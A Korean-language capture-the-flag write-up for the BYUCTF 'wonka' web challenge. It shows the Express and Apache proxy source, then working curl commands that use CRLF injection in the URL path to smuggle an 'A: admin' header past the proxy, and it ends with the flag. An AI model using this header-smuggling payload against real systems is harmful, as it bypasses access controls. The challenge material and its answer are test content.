소스코드

• server.js

  // imports
  const express = require('express');
  const fs = require('fs');
  
  // initializations
  const app = express()
  const FLAG = fs.readFileSync('flag.txt', { encoding: 'utf8', flag: 'r' }).trim()
  const PORT = 3000
  
  // endpoints
  app.get('/', async (req, res) => {
      if (req.header('a') && req.header('a') === 'admin') {
          return res.send(FLAG);
      }
      return res.send('Hello '+req.query.name.replace("<","").replace(">","")+'!');
  });
  
  // start server
  app.listen(PORT, async () => {
      console.log(`Listening on ${PORT}`)
  });
  

• httpd.conf

  LoadModule rewrite_module modules/mod_rewrite.so
  LoadModule proxy_module modules/mod_proxy.so
  LoadModule proxy_http_module modules/mod_proxy_http.so
  
  <VirtualHost *:80>
  
      ServerName localhost
      DocumentRoot /usr/local/apache2/htdocs
  
      RewriteEngine on
      RewriteRule "^/name/(.*)" "<http://backend:3000/?name=$1>" [P]
      ProxyPassReverse "/name/" "<http://backend:3000/>"
  
      RequestHeader unset A
      RequestHeader unset a
  
  </VirtualHost>
  

풀이

• 헤더에 a : admin을 넣으면 flag 출력이 쉽다.

  • httpd.conf에서 헤더의 a 값을 막는다.

• CRLF 로 우회하기로 결정

  • curl --path-as-is -i \\ -H "Host: wonka.chal.cyberjousting.com" \\ '<https://wonka.chal.cyberjousting.com/name/test%0aA:%20admin'>

  • http/2에서는 crlf 인젝션이 실행이 안됨

    

• 그래서 정확히 http/1.1을 입력해서 요청을 보내준다.

  • curl -i --http1.1 --path-as-is \\ -H "Host: wonka.chal.cyberjousting.com" \\ '<https://wonka.chal.cyberjousting.com/name/foo%0d%0aA:%20admin%0d%0a%0d%0a’>
  • --http1.1 : HTTP/1.1 로 통신 강제
  • --path-as-is : %0d%0a 가 디코딩·정규화되지 않고 그대로 전송되도록
  • URL 끝에 %0d%0a%0d%0a :
    1. 첫 %0d%0a 로 “GET /...?name=foo” 라인 끝에서 인위적 헤더 분리
    2. 이어지는 A: admin 헤더 주입
    3. 마지막 %0d%0a%0d%0a 로 “헤더 종료” 구분

  

• flag

  • byuctf{i_never_liked_w1lly_wonka}